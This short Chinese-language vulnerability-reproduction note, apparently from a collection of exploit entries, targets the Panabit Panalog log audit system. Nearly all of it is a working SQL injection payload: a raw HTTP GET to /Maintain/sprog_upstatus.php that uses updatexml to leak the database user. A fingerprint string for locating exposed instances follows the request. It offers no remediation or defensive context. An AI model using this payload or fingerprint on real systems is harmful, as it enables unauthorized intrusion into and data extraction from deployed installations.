B13-1北京派网软件有限公司-Panabit-Panalog大数据日志审计系统-SQL
漏洞复现:
payload:
GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Host: 127.0.0.1
body="Maintain/cloud_index.php"